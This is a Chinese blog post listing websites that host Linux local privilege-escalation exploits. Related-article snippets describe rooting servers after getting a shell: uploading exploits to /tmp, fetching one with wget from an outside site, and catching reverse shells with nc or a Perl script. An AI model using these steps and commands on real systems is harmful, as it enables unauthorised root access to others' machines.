linux 本地提权exp网址集合

最新推荐文章于 2024-05-27 11:45:39 发布
最新推荐文章于 2024-05-27 11:45:39 发布
阅读量3k 收藏 2
点赞数
分类专栏: T00ls 文章标签: 本地提权exp

最近在提一个debian 64位的服务器,内核版本比较特殊,一直没提下来。其它方法又不太会,于是google和问兄弟们了一些exp的网址,这里做个记录吧,方便以后查阅。

http://www.exploit-db.com  史上最强大的漏洞库,这个肯定得放第一位

http://sebug.net/paper/linux_exp sebug的,不过很久没更新了

http://localroot.th3-0utl4ws.com 外国人比较喜欢用的一个网址,同样很久没更新了

http://exploitsdownload.com  无意间搜到的强大的exp地址

http://vulnfactory.org/exploits  这个是博主自己写的exp,外国人果然厉害

http://fuzzexp.org/exp  炊少那批9区人搞的

 

有空再google一下其它exp,如果还是搞不定,就只能从程序入手了。

7禧
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux系统漏洞本地提权
xiongIT的博客
11-23 2064
如何预防Linux系统漏洞本地提权
简单的linux提权收集的N多linux内核exp
03-12
拿到shell了,准备提权.先看下linux内核 2.6.18-194.11.3.el5 内核 2010的,这个好CentOS release 5.5好提 然后百度或者其它路径找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢? 因为tmp目录可写可执行一般,继续ing. 找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666 然后再点你shell 连接成功就出现下面的内容 然后我们进到/tmp目录 cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194 我这里有权限rwx,可读可写可执行.如果没有权限chmod -R 777 文件名 我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译gcc -o /tmp/文件名 /tmp/文件名.c ,自己编译下就行了 成功了 其实linux提权还是很简单,关键看有没exp
Linux提权exp大全
weixin_30437847的博客
08-07 607
如下表 #CVE  #Description  #Kernels CVE-2017-1000367  [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494  [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14) CVE-2016-5195  [Dirty cow] ...
最详细Linux提权总结(建议收藏)
最新发布
HUANGXIN9898的博客
05-27 1107
1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.2.命令执行者要对该程序文件拥有执行(x)权限.3.命令执行者在执行该程序时获得该程序文件属主的身份.4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效。
Linux 提权 exp 大全
03-15
linux提权exp 集成现在几乎所有的exp 还有反弹shell脚本 pl版的反弹和.C文件的反弹
Linux提权-依赖exp
bronze_s的博客
02-05 477
最近拜读了一下大佬的博客,果然都是精华,只是个人解释,若有错误之处,非常感谢各位提出。 大神的github链接:https://github.com/Micropoor/Micro8 漏洞名称 漏洞存在位置 涉及的版本 CVE-2017-1000367 [Sudo](Sudo 1.8.6p7 - 1.8.20) CVE-2017-1000112 [a memory corruption due to UFO to non-UFO path switch] CVE-2017-7494 [Samba
Linux提权手法总结以及 Linux提权exp集合
02-22
本文将深入探讨Linux提权的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞提权是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root权限。例如...
dirtycow脏牛linux提权exp
03-25
总的来说,"Dirty COW"是一个严重的Linux提权漏洞,对系统的安全性构成重大威胁。了解其工作原理、潜在风险以及防范措施,对于系统管理员和安全研究人员来说都是必不可少的知识。通过深入研究"dirtycow-master"中的...
Linux Polkit本地提权
02-07
描述:Polkit 是用于在类 Unix 操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进 程进行通信的有组织的方式。CVE-2021-4034,polkit 的...利用:上传exp,给权限执行cve-2021-4034-poc提权获得root权限
Linux提权EXP tools收藏
02-27
"Linux提权EXP tools收藏"标题表明这是一个关于Linux系统提权利用工具的集合,主要针对不同版本的Linux内核。 描述中提到的"提权EXP"是“提权exploit”的缩写,exploit是指利用系统或软件的漏洞来执行非授权操作的...
CentOS 5.5提权exp
03-20
CentOS 5.5提权exp
exp提权源码
08-08
给研究系统安全的朋友准备的,提权什么的相信大家都懂。
Linux kernel <= v3.15-rc4 本地提权 Exploit 已测
收集盒 Book box
05-24 1947
[8090sec@Test2 ~]$ id uid=501(8090sec) gid=501(8090sec) groups=501(8090sec) [8090sec@Test2 ~]$ wget http://www.8090sec.com/Exploit/cve-2014-0196-md.c [8090sec@Test2 ~]$ chmod +x cve-2014-0196-md.c
linux永久提权,Linux 提权-依赖 Exp
weixin_39613433的博客
05-15 249
exp注:CVE-2017-1000367[Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-1000112 [a memory corruption due to UFO to non-UFO path switch]CVE-2017-7494 [Samba Remote execution](Samba 3.5.0-4.6.4/4.5.10/4.4.14)CVE-20...
简单linux本地提权,linux下简单提权实现
weixin_42498909的博客
05-21 613
今天个大家介绍一个linux下利用环境变量提权的方法。这个方法呢,首先是你要有一个sudo权限的账户。比如,我这里有个www账户,拥有sudo权限,然后我就利用这个www账户,提权到root权限。 欧克,下面开始提权。首先第一步,先登陆www账户,并在家目录下创建script文件夹 然后在家目录下创建c文件,文件名称随便你愿意,比如test.c,该文件内容如下: 保存文件内容后,用sudo权限g...
Linux提权
qq_42465440的博客
03-03 4539
Linux提权 脏牛提权 suid提权 Polkit提升漏洞 脚本提权
Linux本地提权漏洞(CVE-2019-13272)预警
systemino的博客
07-31 2470
2019年07月20日,Linux正式修复了一个本地内核提权漏洞。通过此漏洞,攻击者可将普通权限用户提升为Root权限。 漏洞描述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数。但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用。 PTRACE_TRACEME获取父进...
Linux系统提权思路
热门推荐
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的提权exp放出来,如果有的话,直接编译运行提权即可,简单粗暴。       如果没有相关内核的提权exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种提权思路,第一种就是内核e
linux溢出提权
weixin_30493401的博客
11-13 138
先在网站目录上传1.pl,是个反弹脚本 Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0 然后执行 ./1.pl 本机IP 1224接着本机监听nc -vv -l -p 1224,图1 反弹成功 输入id bash-3.2$ id uid=529(zeicom) gid=525(zeicom) groups=525(zeicom) bash-3.2$ 这里uid...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值